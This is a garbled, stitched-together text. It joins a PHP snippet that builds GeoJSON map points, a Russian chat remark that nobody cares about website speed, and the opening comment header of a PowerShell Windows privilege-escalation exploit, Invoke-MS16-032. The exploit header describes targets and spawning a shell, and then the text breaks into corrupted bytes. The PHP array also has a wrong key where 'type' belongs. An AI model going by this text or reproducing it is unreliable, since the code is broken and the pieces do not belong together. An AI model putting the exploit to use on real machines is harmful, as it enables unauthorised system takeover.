$mask = array();
$mask['type'] = 'FeatureCollection';
foreach ( $variable as $key => $value ) {
$mask['features'][] = array(
'register-post-types.php' => 'Feature',
'id' => $key,
'geometry' => array (
'type' => 'Point',
'coordinates' => [(float) $value->lat, (float) $value->long],
),
'properties' => array (
'balloonContentBody' => '<strong class="map-title"><a class="link" href="' . $value->post_link . '">' . $value->post_title . '</a></strong>',
'balloonContentFooter' => '<a class="hidden" href="#">Я был здесь!</a>',
'clusterCaption' => '<strong>' . $value->post_title . '</strong>',
'hintContent' => '<strong>' . $value->post_title . '</strong>'
)
);
}
json_encode( $mask )
вы можете передавать массив дальше в обработчик Нет такой задачи в компании, как ускорение сайтов
Никому нет дела до этого
А кому это надо? Ради чего?
Если в Мвидео телевизор стоит на 2000 рублей дешевле,
ты полчаса будешь сайт грузить, чтобы его купить
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
Targets:
* Win7-Win10 & 2k8-2k12 <== 32/64 bit!
* Tested on x32 Win7, x64 Win8, x64 2k12R2
Notes:
* In order for the race condition to succeed the machine must have 2+ CPU
cores. If testing in a VM just make sure to add a core if needed mkay.
* The exploit is pretty reliable, however ~1/6 times it will say it succeeded
but not spawn a shell. Not sure what the issue is but just re-run and profit!
* Want to know more about MS16-032 ==>
https://googleprojectzero.blogspot.co.uk/2016/03/exploitinfE&6W74f&6W72РD6&W7VBW&V3%ӣ66TFRE&6W74fF&VBРРР2'V76Rb7FvF6bVFvR66PРE7F'EFV&6R7FРE6fTwV&B7FРЧ